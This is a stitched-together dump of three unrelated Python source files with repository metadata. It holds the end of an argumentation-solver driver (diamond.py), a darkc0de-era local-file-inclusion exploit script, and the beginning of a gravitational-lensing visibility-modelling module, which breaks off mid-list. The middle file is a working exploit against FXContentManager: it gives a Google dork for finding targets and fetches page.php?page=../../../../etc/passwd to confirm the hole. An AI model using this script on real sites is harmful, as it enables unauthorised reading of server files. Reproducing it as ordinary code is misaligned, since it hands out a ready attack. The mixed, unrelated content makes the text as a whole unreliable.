            None
    if not allmodels:
        # restore the enumerate-all option for subsequent calls
        clingo_options.append('0')
def twostepsolvercall(encodings1,encodings2,instance,headline):
    """Run the clingo | pref.py | clingo pipeline used for the
    maximization-based semantics (preferred/naive/stage/semi-model).

    The first clingo call enumerates candidate interpretations as JSON,
    pref.py reifies them, and the second clingo call selects the
    maximal ones.
    """
    global clingo_options,clstderr
    dia_print("==============================")
    dia_print(headline)
    sys.stdout.flush()
    #clingo_options= ['0']
    #clstderr=sp.DEVNULL
    clingo1 = sp.Popen([clingo]+encodings1+[enc['show']]+[instance]+['--outf=2']+['0'], shell=False, stdout=sp.PIPE, stderr=clstderr)
    python2 = sp.Popen([python]+[enc['prefpy']],shell=False, stdin=clingo1.stdout, stdout=sp.PIPE)
    # close our copies of the pipe ends so SIGPIPE propagates correctly
    clingo1.stdout.close()
    clingo2 = sp.Popen([clingo]+encodings2+[enc['show']]+['-']+clingo_options, shell=False, stdin=python2.stdout, stderr=clstderr)
    python2.stdout.close()
    dia_print(clingo2.communicate()[0])
def indicates_dung_af(instance):
    """True iff the filename extension marks *instance* as a Dung AF."""
    return instance.endswith(dung_af_file_extension)
def indicates_bipolarity(instance):
    """True iff the filename extension marks *instance* as a bipolar ADF."""
    return instance.endswith(bipolar_file_extension)
def indicates_formula_representation(instance):
    """True iff the filename extension marks *instance* as a
    propositional-formula ADF."""
    return instance.endswith(formula_file_extension)
def main():
    """Parse command-line options, transform the instance if necessary
    and invoke the ASP solver for every requested semantics.
    """
    global clingo_options,clstdout,clstderr,verb_level,args_cred,args_scep,iccma
    parser= argparse.ArgumentParser(description='Program to compute different interpretations for a given ADF', prog='DIAMOND')
    parser.add_argument('instance', metavar='INSTANCE', help='Filename of the ADF instance', default='instance.dl')
    parser.add_argument('-cfi', '--conflict-free', help='compute the conflict-free interpretations', action='store_true', dest='conflict_free')
    parser.add_argument('-nai', '--naive', help='compute the naive interpretations', action='store_true', dest='naive')
    parser.add_argument('-naiD', '--naive-disjunctive', help='compute the naive interpretations (via a disjunctive encoding)', action='store_true', dest='naive_disjunctive')
    parser.add_argument('-stg', '--stage', help='compute the stage interpretations', action='store_true', dest='stage')
    parser.add_argument('-stgD', '--stage-disjunctive', help='compute the stage interpretations (via a disjunctive encoding)', action='store_true', dest='stage_disjunctive')
    parser.add_argument('-sem', '--semi-model', help='compute the semi-model interpretations', action='store_true', dest='semimodel')
    parser.add_argument('-semD', '--semi-model-disjunctive', help='compute the semi-model interpretations (via a disjunctive encoding)', action='store_true', dest='semimodel_disjunctive')
    parser.add_argument('-mod', '--model', help='compute the two-valued models', action='store_true', dest='model')
    parser.add_argument('-stm', '--stablemodel', help='compute the stable models', action='store_true', dest='smodel')
    parser.add_argument('-grd', '--grounded', help='compute the grounded interpretation', action='store_true', dest='grounded')
    parser.add_argument('-com', '--complete', help='compute the complete interpretations', action='store_true', dest='complete')
    parser.add_argument('-adm', '--admissible', help='compute the admissible interpretations', action='store_true', dest='admissible')
    parser.add_argument('-prf', '--preferred', help='compute the preferred interpretations', action='store_true', dest='preferred')
    parser.add_argument('-prfD', '--preferred-disjunctive', help='compute the preferred interpretations (via a disjunctive encoding)', action='store_true', dest='preferred_disjunctive')
    parser.add_argument('-enum', '--enum', help='enumerate all models', action='store_true', dest='enumeration')
    parser.add_argument('-all', '--all', help='compute interpretations for all semantics', action='store_true', dest='all')
    parser.add_argument('-t', '--transform', help='print the transformed adf to stdout', action='store_true', dest='print_transform')
    parser.add_argument('-bc', '--bipolarity-check', help='Check whether a given instance is bipolar or not (implies -pf)',action='store_true',dest='bipolarity_check')
    parser.add_argument('-clt', '--compute-link-types', help='compute the link types (implies instance is bipolar)', action='store_true', dest='compute_link_type')
    #parser.add_argument('-dadm', '--transform_2_dsadf_adm', help='transforms a propositional formula adf into propositional formula dung style adf (admissible)', action='store_true', dest='adf2dadf_adm')
    # -cred and -scep are mutually exclusive reasoning modes
    reasoning_mode = parser.add_mutually_exclusive_group()
    reasoning_mode.add_argument('-cred', metavar='ARGUMENT', help='Check credulous acceptance of ARGUMENT', nargs=1, type=str)
    reasoning_mode.add_argument('-scep', metavar='ARGUMENT', help='Check sceptical acceptance of ARGUMENT', nargs=1, type=str)
    # the input-format switches are mutually exclusive as well
    group = parser.add_mutually_exclusive_group()
    group.add_argument('-af','--argumentation-framework', help='input is a Dung argumentation framework in ASPARTIX syntax with arg/1 and att/2', action='store_true', dest='af_input')
    group.add_argument('-b','--bipolar', help='acceptance functions are given as propositional formulas, attacking and supporting links are specified (implies -pf)', action='store_true', dest='bipolar_input')
    group.add_argument('-pf','--propositional-formulas', help='acceptance functions are given as propositional formulas', action='store_true', dest='transformpform')
    #group.add_argument('-pf','--propositional-formulas-eclipse', help='acceptance functions are given as propositional formulas (translation using ECLiPSe Prolog)', action='store_true', dest='transformpformec')
    group.add_argument('-fr','--functional-representation', help='acceptance functions are given in extensional form', action='store_true', dest='extensionalform')
    group.add_argument('-pr','--priorities', help='acceptance functions are given as preferences among statements', action='store_true', dest='transformprio')
    group.add_argument('-tb','--theory-base', help='input is a theory base consisting of strict and defeasible rules (implies -b)', action='store_true', dest='theory_base_input')
    parser.add_argument('-c', help='specify a config-file', action='store', dest='cfgfile', default='~/.diamond')
    parser.add_argument('--version', help='prints the current version', action='version', version='%(prog)s '+ version)
    parser.add_argument('-v','--verbose', choices=['0','1','2','json','debug','iccma'], dest='verbosity', default='1', help='Control the verbosity of DIAMOND')
    args=parser.parse_args()
    args_cred=args.cred
    args_scep=args.scep
    # NOTE(review): 'tmp' appears to be unused -- confirm before removing
    tmp=tempfile.NamedTemporaryFile(delete=True)
    instance=os.path.abspath(args.instance)
    initvars(args.cfgfile)
    # resolve encoding filenames relative to the install directory
    for el in iter(enc):
        enc[el] = os.path.join(installdir,encdir,enc[el])
    # compute some handy Booleans which are needed later
    af = (indicates_dung_af(args.instance) or args.af_input)
    bipolar = (indicates_bipolarity(args.instance) or args.bipolar_input)
    model_only = args.model and not args.conflict_free and not args.naive and not args.stage and not args.semimodel and not args.naive_disjunctive and not args.stage_disjunctive and not args.semimodel_disjunctive and not args.smodel and not args.grounded and not args.complete and not args.admissible and not args.preferred and not args.preferred_disjunctive and not args.all and not args.print_transform
    do_transformation = args.conflict_free or args.naive or args.stage or args.semimodel or args.naive_disjunctive or args.stage_disjunctive or args.semimodel_disjunctive or args.smodel or args.grounded or args.complete or args.admissible or args.preferred or args.preferred_disjunctive or args.all or args.print_transform
    transform_to_functions = ((indicates_formula_representation(args.instance) or args.transformpform) and not bipolar)
    # assign the correct encodings of the semantics
    model_encoding=[enc['base'],enc['cf'],enc['model']]
    operators=[enc['ac2cico'],enc['base'],enc['op']]
    # check if we get theory base input and add the translation to encodings
    if args.theory_base_input:
        model_encoding=[enc['fmodel'],enc['tb2badf']]
        operators=[enc['bop'],enc['tb2badf']]
    # check if we are dealing with an af and choose the respective operator if so
    if af:
        model_encoding=[enc['afop'],enc['cmp'],enc['twovalued']]
        operators=[enc['afop']]
    # check if the model semantics is the only thing we should compute for a formula ADF and use a special encoding
    if model_only and (indicates_formula_representation(args.instance) or bipolar):
        model_encoding=[enc['fmodel']]
    # otherwise, the choice of operator depends on bipolarity of the instance
    if bipolar:
        operators=[enc['bop']]
    # if the information is insufficient, complain terribly
    if ((not bipolar) and (not transform_to_functions) and (not af) and (not args.theory_base_input)):
        dia_print("No input format specified or indicated! Assuming extensional representation of acceptance functions.")
    # set clingo options
    clingo_options = ['0']
    if not args.enumeration:
        clingo_options.remove('0')
    clstderr = sp.DEVNULL
    clstdout = None
    iccma = False
    # map the -v choice onto clingo flags and our verbosity level
    if args.verbosity == '0':
        clingo_options.append('--verbose=0')
        verb_level = 0
    elif args.verbosity == '1':
        clingo_options.append('--stats=0')
        verb_level = 1
    elif args.verbosity == '2':
        clingo_options.append('--verbose=2')
        verb_level = 2
    elif args.verbosity == 'json':
        clingo_options.append('--outf=2')
        verb_level = 0
    elif args.verbosity == 'debug':
        clstderr = None
        verb_level = 2
    elif args.verbosity == 'iccma':
        verb_level = 0
        iccma = True
        clstdout = sp.PIPE
        clingo_options.append('--outf=2')
        clingo_options.append('--project')
    # if args.adf2dadf_adm:
    #     dia_print("==============================")
    #     dia_print("transforming adf 2 dadf ...")
    #     with sp.Popen(clingo + " " + enc['formulatree'] + " " + instance + " 0 --outf=2", shell=True, stdout=sp.PIPE) as p:
    #         out =''
    #         for byteLine in p.stdout:
    #             out = out + byteLine.decode(sys.stdout.encoding).strip()
    #     dia_print(util.formtree2aspinput(adf2dadf_adm.transform(ft.formulatree(out))))
    if args.bipolarity_check:
        onestepsolvercall([enc['bipc']],instance,"bipolarity check:",False)
    if args.compute_link_type:
        dia_print("==============================")
        dia_print("compute link-types:")
        clingo_options.append('--enum-mode=brave')
        sys.stdout.flush()
        with sp.Popen([clingo,enc['ltype'],instance]+clingo_options,stderr=clstderr,shell=False) as p:
            None
        clingo_options.remove('--enum-mode=brave')
    # if (transform_to_functions and do_transformation and transform=="asp"):
    #     tmp2=tempfile.NamedTemporaryFile(mode='w+t', encoding='utf-8', delete=False)
    #     instance = tmp2.name
    #     dia_print("==============================")
    #     dia_print("transforming pForm ADF using ASP...")
    #     sys.stdout.flush()
    #     with sp.Popen([clingo]+[enc['repr_change']]+[os.path.abspath(args.instance)]+['0'], shell=False,stdout=sp.PIPE,stderr=None) as p:
    #         sto = p.stdout
    #         i=1
    #         for byteLine in sto:
    #             line = byteLine.decode(sys.stdout.encoding).strip()
    #             if "ci(" in line or "co(" in line:
    #                 tmp2.write(line.replace("constant", str(i)).replace(") l(","). l(").replace(") s(","). s(").replace(") co(","). co(").replace(") ci(","). ci(")+".\n")
    #                 i+=1
    #     tmp2.close()
    #     filesToDelete.append(instance)
    if (transform_to_functions and do_transformation and transform=="eclipse"):
        # translate the propositional-formula ADF via ECLiPSe Prolog
        tmp2=tempfile.NamedTemporaryFile(delete=False)
        instance = tmp2.name
        filesToDelete.append(instance)
        dia_print("==============================")
        dia_print("transforming pForm ADF using Eclipse...")
        sys.stdout.flush()
        start = time.time()
        with sp.Popen([eclipse,"-f",enc['transformpl'],"-e", "main", "--", os.path.abspath(args.instance),instance],stderr=None,shell=False) as p:
            None
        elapsed = (time.time() - start)
        elapsedstring = "%.3f" % (elapsed,)
        dia_print("transformation took " + elapsedstring + " seconds")
    if args.transformprio and do_transformation:
        # translate a prioritized ADF via the transform.py helper script
        tmp2 = tempfile.NamedTemporaryFile(delete=False)
        instance = tmp2.name
        dia_print("==============================")
        dia_print("transforming prioritized ADF...")
        sys.stdout.flush()
        start = time.time()
        wd = os.getcwd()
        os.chdir(installdir + "/" + encdir)
        # NOTE(review): looks like a space is missing between the script
        # path and the instance argument -- confirm against the repo
        os.system("python " + enc['transformpy'] + os.path.abspath(args.instance) + " > " + instance)
        os.chdir(wd)
        elapsed = (time.time() - start)
        elapsedstring = "%.3f" % (elapsed,)
        dia_print("transformation took " + elapsedstring + " seconds")
        filesToDelete.append(instance)
    if args.print_transform:
        os.system("cat " + instance)
    # run the solver once per requested semantics
    if args.model or args.all:
        onestepsolvercall(model_encoding,instance,"two-valued models")
    if args.smodel or args.all: # note that stable models are not yet working for the functional representation
        onestepsolvercall([enc['base'],enc['cf'],enc['model'],enc['opsm'],enc['tkk'],enc['stb']],instance,"stable models:")
    if args.conflict_free or args.all:
        onestepsolvercall(operators+[enc['cfi']],instance,"conflict-free interpretations:")
    if args.admissible or args.all:
        onestepsolvercall(operators+[enc['adm']],instance,"admissible interpretations:")
    if args.complete or args.all:
        onestepsolvercall(operators+[enc['cmp']],instance,"complete interpretations:")
    if args.grounded or args.all:
        onestepsolvercall(operators+[enc['tkk'],enc['grd']],instance,"grounded interpretation:")
    if args.naive_disjunctive or args.all:
        onestepsolvercall(operators+[enc['naiD']],instance,"naive interpretations:")
    if args.preferred_disjunctive or args.all:
        onestepsolvercall(operators+[enc['prfD']],instance,"preferred interpretations:")
    if args.stage_disjunctive or args.all:
        onestepsolvercall(operators+[enc['stgD']],instance,"stage interpretations:")
    if args.semimodel_disjunctive or args.all:
        onestepsolvercall(operators+[enc['semD']],instance,"semi-model interpretations:")
    if args.preferred or args.all:
        twostepsolvercall(operators+[enc['cmp']],[enc['imax']],instance,"preferred interpretations:")
    if args.naive or args.all:
        twostepsolvercall(operators+[enc['cfi']],[enc['imax']],instance,"naive interpretations:")
    if args.stage or args.all:
        twostepsolvercall(operators+[enc['cfi']],[enc['rmax']],instance,"stage interpretations:")
    if args.semimodel or args.all:
        twostepsolvercall(operators+[enc['cmp']],[enc['rmax']],instance,"semi-model interpretations:")
    # clean up temporary constraint/transformation files
    for fileToDelete in filesToDelete:
        os.remove(fileToDelete)
# standard script entry point
if __name__ == "__main__":
    main()
|
tillmo/diamond-adf-code
|
diamond.py
|
Python
|
gpl-3.0
| 21,997
|
[
"ADF"
] |
e328687a77dfdeea1a5d45f57b138137fed20fb484abc7ca80b3b97b966a4ac9
|
#!/usr/bin/python
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# !!! Special thanx for d3hydr8 and rsauron who inspired me !!!
#
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --- d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu #
# --- QKrun1x - skillfaker - Croathack - Optyx - Nuclear #
# --- Eliminator and to all members of darkc0de and ljuska.org# #
################################################################
################################################################
#
# LFI bug found by marcoj (www.x0rg.net) and r0ot (www.x0rg.net)
#
# Sql injection on www.reversedelta.co.uk and CMS name found by me :)
#
import sys, os, time, urllib2, re
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearint = 'cls'
os.system(clearing)
if len(sys.argv) !=2:
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 01/2009 LFI FXContentManager |"
print "| Example: fxcms.py http://www.site.com/ |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|---------------------------------------------------------------|\n"
sys.exit(1)
site = sys.argv[1]
if site[:4] != "http":
site = "http://"+site
if site[-1] != "/":
site = site + "/"
print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com |"
print "| 01/2009 LFI FXContentManager |"
print "| Visit www.darkc0de.com and www.ljuska.org |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s" % time.strftime("%X")
print "\n[+] CMS --> FXContentManager"
print "\n[+] Google dork : inurl:/fxmodules/"
print "\n[+] Lets search for lfi bug :)"
print "\n[+] Target:",site
print "\n[+] Check if vulnerable ..."
print
try:
target = urllib2.urlopen(site+"fxmodules/page.php?page=../../../../etc/passwd").read()
if re.findall("root:x:", target):
print "[!] Site is vulnerable "
print
print "*"*95
print "\t"+site+"fxmodules/page.php?page=../../../../etc/passwd"
print "*"*95
print
else:
print "\t[-] Sorry, this site is not vulnerable"
print
except(urllib2.HTTPError):
pass
except(KeyboardInterrupt, SystemExit):
raise
print "\n[-] %s" % time.strftime("%X")
|
knightmare2600/d4rkc0de
|
exploits/090115.py
|
Python
|
gpl-2.0
| 3,500
|
[
"VisIt"
] |
117306340f002f39fa5160590b352d30a6d4be28d9ccc83dc67e17c38086a48a
|
__all__ = ['Visdata','SersicSource','GaussSource','PointSource','SIELens','ExternalShear',
'read_visdata','concatvis','bin_visibilities']
import numpy as np
import os
import astropy.constants as co
import warnings
from .utils import cart2pol,pol2cart
# Physical constants pulled from astropy.constants (SI units).
c = co.c.value # speed of light, in m/s
G = co.G.value # gravitational constant in SI units
Msun = co.M_sun.value # solar mass, in kg
Mpc = 1e6*co.pc.value # 1 Mpc, in m
# Angle conversion factors used throughout the lensing code.
arcsec2rad = (np.pi/(180.*3600.)) # arcseconds -> radians
rad2arcsec =3600.*180./np.pi # radians -> arcseconds
deg2rad = np.pi/180. # degrees -> radians
class Visdata(object):
    """
    Class to hold all necessary info relating to one set of visibilities.

    Auto-updates amp&phase or real&imag if those values are changed, but
    MUST SET WITH, eg, visobj.amp = (a numpy array of the new values);
    CANNOT USE, eg, visobj.amp[0] = newval, AS THIS DOES NOT CALL THE
    SETTER FUNCTIONS.

    Parameters:
    u numpy ndarray
        The Fourier plane u coordinates of the visibilities to follow.
    v numpy ndarray
        The Fourier plane v coordinates of the visibilities to follow.
    real numpy ndarray
        The real parts of the visibilities
    imag numpy ndarray
        The imaginary parts of the visibilities
    sigma numpy ndarray
        The uncertainties on the visibilities
    ant1 numpy ndarray
        The first antenna number or name of the visibility on each baseline
    ant2 numpy ndarray
        The second antenna number or name of the visibility on each baseline
    PBfwhm float
        The FWHM of the antenna primary beam at this wavelength (at present
        assumes a homogeneous antenna array)
    filename str
        A filename associated with these data.
    """

    def __init__(self, u, v, real, imag, sigma, ant1=None, ant2=None,
                 PBfwhm=None, filename=None):
        self.u = u
        self.v = v
        self.real = real
        self.imag = imag
        self.sigma = sigma
        self.ant1 = ant1
        self.ant2 = ant2
        self.PBfwhm = PBfwhm
        self.filename = filename

    @property
    def uvdist(self):
        # Baseline length in the Fourier plane.
        return np.sqrt(self.u**2. + self.v**2.)

    @property
    def real(self):
        return self._real

    @real.setter
    def real(self, val):
        """Set the real part and keep amp/phase in sync."""
        self._real = val
        # Setting amp & phase during __init__ will fail since imag is still unknown
        # Doing so during conjugate() will also fail, but gives a ValueError
        try:
            self._amp = np.sqrt(self._real**2. + self.imag**2.)
            self._phase = np.arctan2(self.imag, self._real)
        except (AttributeError, ValueError):
            self._amp = None
            self._phase = None

    @property
    def imag(self):
        return self._imag

    @imag.setter
    def imag(self, val):
        """Set the imaginary part and keep amp/phase in sync."""
        self._imag = val
        try:
            self._amp = np.sqrt(self.real**2. + self._imag**2.)
            self._phase = np.arctan2(self._imag, self.real)
        except (AttributeError, ValueError):
            self._amp = None
            self._phase = None

    @property
    def amp(self):
        return self._amp

    @amp.setter
    def amp(self, val):
        """Set the amplitude and recompute real/imag from the current phase."""
        self._amp = val
        self._real = val * np.cos(self.phase)
        self._imag = val * np.sin(self.phase)

    @property
    def phase(self):
        return self._phase

    @phase.setter
    def phase(self, val):
        """Set the phase and recompute real/imag from the current amplitude."""
        self._phase = val
        self._real = self.amp * np.cos(val)
        self._imag = self.amp * np.sin(val)

    def __add__(self, other):
        # Sum of two visibility sets; sigmas combine in inverse quadrature.
        # NOTE: ant1/ant2/PBfwhm/filename are deliberately not propagated.
        return Visdata(self.u, self.v, self.real+other.real, self.imag+other.imag,
                       (self.sigma**-2. + other.sigma**-2.)**-0.5)

    def __sub__(self, other):
        # Difference of two visibility sets; sigmas combine in inverse quadrature.
        return Visdata(self.u, self.v, self.real-other.real, self.imag-other.imag,
                       (self.sigma**-2. + other.sigma**-2.)**-0.5)

    def conjugate(self):
        """Append the complex-conjugate (u,v -> -u,-v) points in place."""
        u = np.concatenate((self.u, -self.u))
        v = np.concatenate((self.v, -self.v))
        real = np.concatenate((self.real, self.real))
        imag = np.concatenate((self.imag, -self.imag))
        sigma = np.concatenate((self.sigma, self.sigma))
        ant1 = np.concatenate((self.ant1, self.ant2))
        ant2 = np.concatenate((self.ant2, self.ant1))
        self.u = u
        self.v = v
        self.real = real
        self.imag = imag
        self.sigma = sigma
        self.ant1 = ant1
        self.ant2 = ant2

    def to_binfile(self, filename, overwrite=False):
        """
        Write out the visibility data to a .bin file that can then be read by
        vl.read_visdata.

        filename: string
            File to write out to. Will have '.bin' appended to it if not already given.
        overwrite: boolean
            If filename already exists and overwrite=False, will not overwrite existing file.
        """
        allarr = np.vstack((self.u, self.v, self.real, self.imag, self.sigma,
                            self.ant1, self.ant2))
        if not filename[-4:] == '.bin':
            filename += '.bin'
        if os.path.isfile(filename) and not overwrite:
            # BUG FIX: the message template was never formatted with the filename.
            raise IOError('filename {0:s} exists and overwrite=False; '
                          'use visdata.to_binfile(filename,overwrite=True) '
                          'to overwrite'.format(filename))
        with open(filename, 'wb') as f:
            allarr.tofile(f)
            # BUG FIX: f.write(self.PBfwhm) fails (a float is not bytes/str).
            # Append PBfwhm as one trailing float64 so read_visdata's
            # "PBfwhm = data[-1]" convention works.
            np.array([self.PBfwhm]).tofile(f)
class SIELens(object):
    """
    Class to hold parameters for an SIE lens, with each parameter (besides
    redshift) a dictionary.
    Example format of each parameter:
    x = {'value':x0,'fixed':False,'prior':[xmin,xmax]}, where x0 is the
    initial/current value of x, x should not be a fixed parameter during fitting,
    and the value of x must be between xmin and xmax.
    Note: in my infinite future free time, will probably replace e and PA with
    the x and y components of the ellipticity, which are better behaved as e->0.
    Parameters:
    z
        Lens redshift. If unknown, any value can be chosen as long as it is
        less than the source redshift you know/assume.
    x, y
        Position of the lens, in arcseconds relative to the phase center of
        the data (or any other reference point of your choosing). +x is west
        (sorry not sorry), +y is north.
    M
        Lens mass, in Msun. With the lens and source redshifts, sets the
        overall "strength" of the lens. Can be converted to an Einstein radius
        using theta_Ein = (4*G*M * D_LS / (c**2 * D_L * D_S))**0.5, in radians,
        with G and c the gravitational constant and speed of light, and D_L, D_S
        and D_LS the distances to the lens, source, and between the lens and source,
        respectively.
    e
        Lens ellipticity, ranging from 0 (a circularly symmetric lens) to 1 (a very
        elongated lens).
    PA
        Lens major axis position angle, in degrees east of north.
    """
    def __init__(self,z,x,y,M,e,PA):
        # Do some input handling. Bare numbers get promoted to parameter
        # dicts with default priors; dicts passed by the caller get any
        # missing 'fixed'/'prior' keys backfilled (mutating them in place).
        if not isinstance(x,dict):
            x = {'value':x,'fixed':False,'prior':[-30.,30.]}
        if not isinstance(y,dict):
            y = {'value':y,'fixed':False,'prior':[-30.,30.]}
        if not isinstance(M,dict):
            M = {'value':M,'fixed':False,'prior':[1e7,1e15]}
        if not isinstance(e,dict):
            e = {'value':e,'fixed':False,'prior':[0.,1.]}
        if not isinstance(PA,dict):
            PA = {'value':PA,'fixed':False,'prior':[0.,180.]}
        # Every parameter dict must at least carry a current value.
        if not all(['value' in d for d in [x,y,M,e,PA]]):
            raise KeyError("All parameter dicts must contain the key 'value'.")
        if not 'fixed' in x: x['fixed'] = False
        if not 'fixed' in y: y['fixed'] = False
        if not 'fixed' in M: M['fixed'] = False
        if not 'fixed' in e: e['fixed'] = False
        if not 'fixed' in PA: PA['fixed'] = False
        if not 'prior' in x: x['prior'] = [-30.,30.]
        if not 'prior' in y: y['prior'] = [-30.,30.]
        if not 'prior' in M: M['prior'] = [1e7,1e15]
        if not 'prior' in e: e['prior'] = [0.,1.]
        if not 'prior' in PA: PA['prior'] = [0.,180.]
        self.z = z
        self.x = x
        self.y = y
        self.M = M
        self.e = e
        self.PA = PA
        # Here we keep a Boolean flag which tells us whether one of the lens
        # properties has changed since the last time we did the lensing
        # deflections. If everything is the same, we don't need to lens twice.
        self._altered = True

    def deflect(self,xim,yim,Dd,Ds,Dds):
        """
        Follow Kormann+1994 for the lensing deflections.

        Results are cached on self.deflected_x / self.deflected_y (in
        arcseconds) and only recomputed when self._altered is True.

        Parameters:
        xim, yim
            2D Arrays of image coordinates we're going to lens,
            probably generated by np.meshgrid.
        Dd, Ds, Dds
            Distances to the lens, source and between the source
            and lens (units don't matter as long as they're the
            same). Can't be calculated only from lens due to source
            distances.
        """
        if self._altered: # Only redo if something is new.
            ximage, yimage = xim.copy(), yim.copy() # for safety.
            f = 1. - self.e['value']        # axis ratio in the K+94 convention
            fprime = np.sqrt(1. - f**2.)
            # K+94 parameterizes in terms of LOS velocity dispersion and then
            # basically the Einstein radius.
            sigma = ((self.M['value']*Ds*G*Msun*c**2.)/(4*np.pi**2. * Dd*Dds*Mpc))**(1/4.)
            Xi0 = 4*np.pi * (sigma/c)**2. * (Dd*Dds/Ds)
            # Flip units, the recenter and rotate grid to lens center and major axis
            ximage *= arcsec2rad; yimage *= arcsec2rad
            ximage -= (self.x['value']*arcsec2rad)
            yimage -= (self.y['value']*arcsec2rad)
            if not np.isclose(self.PA['value'], 0.):
                r,theta = cart2pol(ximage,yimage)
                ximage,yimage = pol2cart(r,theta-(self.PA['value']*deg2rad))
            phi = np.arctan2(yimage,ximage)
            # Calculate the deflections, account for e=0 (the SIS), which has
            # cancelling infinities. K+94 eq 27a.
            if np.isclose(f, 1.):
                dxs = -(Xi0/Dd)*np.cos(phi)
                dys = -(Xi0/Dd)*np.sin(phi)
            else:
                dxs = -(Xi0/Dd)*(np.sqrt(f)/fprime)*np.arcsinh(np.cos(phi)*fprime/f)
                dys = -(Xi0/Dd)*(np.sqrt(f)/fprime)*np.arcsin(np.sin(phi)*fprime)
            # Rotate and shift back to sky frame
            if not np.isclose(self.PA['value'], 0.):
                r,theta = cart2pol(dxs,dys)
                dxs,dys = pol2cart(r,theta+(self.PA['value']*deg2rad))
            dxs *= rad2arcsec; dys *= rad2arcsec
            self.deflected_x = dxs
            self.deflected_y = dys
            self._altered = False
class ExternalShear(object):
    """
    Two-parameter external tidal shear, with each parameter stored as a
    dict of the form
        x = {'value':x0,'fixed':False,'prior':[xmin,xmax]},
    where x0 is the initial/current value, 'fixed' says whether the
    parameter is held constant during fitting, and 'prior' bounds the
    allowed range.

    Parameters:
    shear:
        Strength of the external shear, from 0 to 1 (treating other
        objects in the lensing environment like this is really only
        valid for shear <~ 0.3).
    shearangle
        Position angle of the tidal shear, in degrees east of north.
    """
    def __init__(self, shear, shearangle):
        # Promote bare numbers to full parameter dicts with default priors.
        if not isinstance(shear, dict):
            shear = {'value': shear, 'fixed': False, 'prior': [0., 1.]}
        if not isinstance(shearangle, dict):
            shearangle = {'value': shearangle, 'fixed': False, 'prior': [0., 180.]}
        # Every parameter dict must at least carry a current value.
        if any('value' not in par for par in (shear, shearangle)):
            raise KeyError("All parameter dicts must contain the key 'value'.")
        # Backfill any missing bookkeeping keys (mutates caller dicts in place,
        # matching the behavior elsewhere in this module).
        shear.setdefault('fixed', False)
        shear.setdefault('prior', [0., 1.])
        shearangle.setdefault('fixed', False)
        shearangle.setdefault('prior', [0., 180.])
        self.shear = shear
        self.shearangle = shearangle

    def deflect(self, xim, yim, lens):
        """
        Calculate deflection following Keeton, Mao & Witt 2000; results are
        stored on self.deflected_x / self.deflected_y.

        Parameters:
        xim, yim
            2D arrays of image coordinates we're going to lens, probably
            generated by np.meshgrid.
        lens
            A lens object; used to shift (and rotate) the coordinate system
            so it is centered on, and aligned with, the lens.
        """
        xs, ys = xim.copy(), yim.copy()
        # Move to a frame centered on the lens.
        xs -= lens.x['value']
        ys -= lens.y['value']
        rotate = not np.isclose(lens.PA['value'], 0.)
        if rotate:
            # Align with the lens major axis.
            r, th = cart2pol(xs, ys)
            xs, ys = pol2cart(r, th - (lens.PA['value'] * deg2rad))
        # KMW2000, altered for our coordinate convention.
        g = self.shear['value']
        thg = (self.shearangle['value'] - lens.PA['value']) * deg2rad
        dxs = -g * np.cos(2 * thg) * xs - g * np.sin(2 * thg) * ys
        dys = -g * np.sin(2 * thg) * xs + g * np.cos(2 * thg) * ys
        if rotate:
            # Rotate the deflections back to the sky frame.
            r, th = cart2pol(dxs, dys)
            dxs, dys = pol2cart(r, th + (lens.PA['value'] * deg2rad))
        self.deflected_x = dxs
        self.deflected_y = dys
class SersicSource(object):
    """
    Class to hold parameters of an elliptical Sersic light profile, ie
    I(x,y) = A * exp(-bn*((r/reff)^(1/n)-1)),
    where bn makes reff enclose half the light (varies with Sersic index),
    and all the variable parameters are dictionaries. This profile is
    parameterized by the major axis and axis ratio; you can get the half-light
    radius with r_eff = majax * sqrt(axisratio).

    Example format of each parameter:
    x = {'value':x0,'fixed':False,'prior':[xmin,xmax]}, where x0 is the
    initial/current value of x, x should not be a fixed parameter during fitting,
    and the value of x must be between xmin and xmax.

    Parameters:
    z
        Source redshift. Can be made up, as long as it's higher than
        the lens redshift.
    lensed
        True/False flag determining whether this object is actually lensed
        (in which case it gets run through the lensing equations) or not (in
        which case it's simply added to the model of the field without lensing).
        This also determines the convention for the source position coordinates,
        see below.
    xoff, yoff
        Position of the source in arcseconds. If lensed is True, this position
        is relative to the position of the lens (or the first lens in a list of
        lenses). If lensed is False, this position is relative to the field
        center (or (0,0) coordinates). +x is west (sorry not sorry), +y is north.
    flux
        Total integrated flux density of the source (ie, NOT peak pixel value), in
        units of Jy.
    majax
        The source major axis in arcseconds.
    index
        The Sersic profile index n (0.5 is ~Gaussian, 1 is ~an exponential disk, 4
        is a de Vaucoleurs profile).
    axisratio
        The source minor/major axis ratio, varying from 1 (circularly symmetric) to
        0 (highly elongated).
    PA
        Source position angle. If lensed is True, this is in degrees CCW from the
        lens major axis (or first lens in a list of them). If lensed is False, this
        is in degrees east of north.
    """

    def __init__(self, z, lensed=True, xoff=None, yoff=None, flux=None,
                 majax=None, index=None, axisratio=None, PA=None):
        # (name, passed value, default prior) for every fit parameter.
        # BUG FIX: the default prior for `index` was inconsistent between the
        # bare-value path ([0.3, 4.]) and the dict-backfill path ([1/3., 10]);
        # unified to [0.3, 4.] so both entry paths agree.
        spec = (('xoff', xoff, [-10., 10.]),
                ('yoff', yoff, [-10., 10.]),
                ('flux', flux, [1e-5, 1.]),       # ~0.01 mJy to 1 Jy source
                ('majax', majax, [0., 2.]),       # arcsec
                ('index', index, [0.3, 4.]),
                ('axisratio', axisratio, [0.01, 1.]),
